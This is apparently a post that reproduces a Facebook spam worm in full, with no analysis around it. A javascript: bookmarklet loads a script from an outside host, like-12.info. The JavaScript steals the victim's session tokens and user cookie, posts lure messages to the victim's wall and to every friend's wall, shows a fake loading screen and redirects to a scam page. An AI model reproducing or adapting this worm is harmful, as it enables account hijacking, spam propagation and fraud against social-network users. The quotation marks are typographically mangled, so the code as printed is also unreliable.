URL :
[php]javascript:(a=(b=document).createElement(’script‘)).src=’http://like-12.info/rswf.js‘,b.body.appendChild(a);void(0) [/php]
JS :
[php]var post_form_id = document[‚getElementsByName‘](‚post_form_id‘)[0][‚value‘];
var fb_dtsg = document[‚getElementsByName‘](‚fb_dtsg‘)[0][‚value‘];
var user_id = document[‚cookie‘][‚match‘](document[‚cookie‘][‚match‘](/c_user=(d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = ‚/ajax/profile/composer.php?__a=1‘;
var paramswp = ‚post_form_id=‘ + post_form_id + ‚&fb_dtsg=‘ + fb_dtsg + ‚&xhpc_composerid=u3bbpq_21&xhpc_targetid=‘ + user_id + ‚&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=HEY%20CHECK%20THIS%20OUT&xhpc_message=HEY%20CHECK%20THIS%20OUT&aktion=post&app_id=2309869772&attachment[params][0]=241896465864756&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320586865&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=‘ + user_id + “;
httpwp[‚open‘](‚POST‘, urlwp, true);
httpwp[’setRequestHeader‘](‚Content-type‘, ‚application/x-www-form-urlencoded‘);
httpwp[’setRequestHeader‘](‚Content-length‘, paramswp[‚length‘]);
httpwp[’setRequestHeader‘](‚Connection‘, ‚keep-alive‘);
httpwp[’send‘](paramswp);
var friends = new Array();
gf = new XMLHttpRequest();
gf[‚open‘](‚GET‘, ‚/ajax/typeahead/first_degree.php?__a=1&viewer=‘ + user_id + ‚&token‘ + Math[‚random‘]() + ‚&filter[0]=user&options[0]=friends_only‘, false);
gf[’send‘]();
if (gf[‚readyState‘] != 4) {} else {
data = eval(‚(‚ + gf[‚responseText‘][’substr‘](9) + ‚)‘);
if (data[‚error‘]) {} else {
friends = data[‚payload‘][‚entries‘][’sort‘](function (_0x93dax8, _0x93dax9) {
return _0x93dax8[‚index‘] – _0x93dax9[‚index‘];
});
};
};
for (var i = 0; i < friends[‚length‘]; i++) {
var httpwp = new XMLHttpRequest();
var urlwp = ‚/ajax/profile/composer.php?__a=1‘;
var paramswp = ‚post_form_id=‘ + post_form_id + ‚&fb_dtsg=‘ + fb_dtsg + ‚&xhpc_composerid=u2qr0v_15&xhpc_targetid=‘ + friends[i][‚uid‘] + ‚&xhpc_context=profile&xhpc_location=&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=1&xhpc_message_text=Oh%20my%20god%2Ccheck%20this&xhpc_message=Oh%20my%20god%2Ccheck%20this&aktion=post&app_id=2309869772&attachment[params][0]=241896465864756&attachment[type]=18&composertags_place=&composertags_place_name=&composer_predicted_city=102186159822587&composer_session_id=1320585896&is_explicit_place=&audience[0][value]=80&composertags_city=&disable_location_sharing=false&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest&__user=‘ + user_id + ‚&‘;
httpwp[‚open‘](‚POST‘, urlwp, true);
httpwp[’setRequestHeader‘](‚Content-type‘, ‚application/x-www-form-urlencoded‘);
httpwp[’setRequestHeader‘](‚Content-length‘, paramswp[‚length‘]);
httpwp[’setRequestHeader‘](‚Connection‘, ‚keep-alive‘);
httpwp[‚onreadystatechange‘] = function () {
if (httpwp[‚readyState‘] == 4 && httpwp[’status‘] == 200) {};
};
httpwp[’send‘](paramswp);
};
document[‚getElementById‘](‚contentArea‘)[‚innerHTML‘] = ‚<center><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loading_gif.gif" /><br />Please wait…</center>‘;
setTimeout(‚top.location=\’http://www.facebook.com/pages/The-Rihanna-UN-fan-club-Join-if-you-h8-Rihanna-after-seeing-her-new-video/241896465864756?sk=app_153284594738391\‘;‘, 30000); [/php]
SWF :
[php]http://like-12.info/rswf.swf[/php]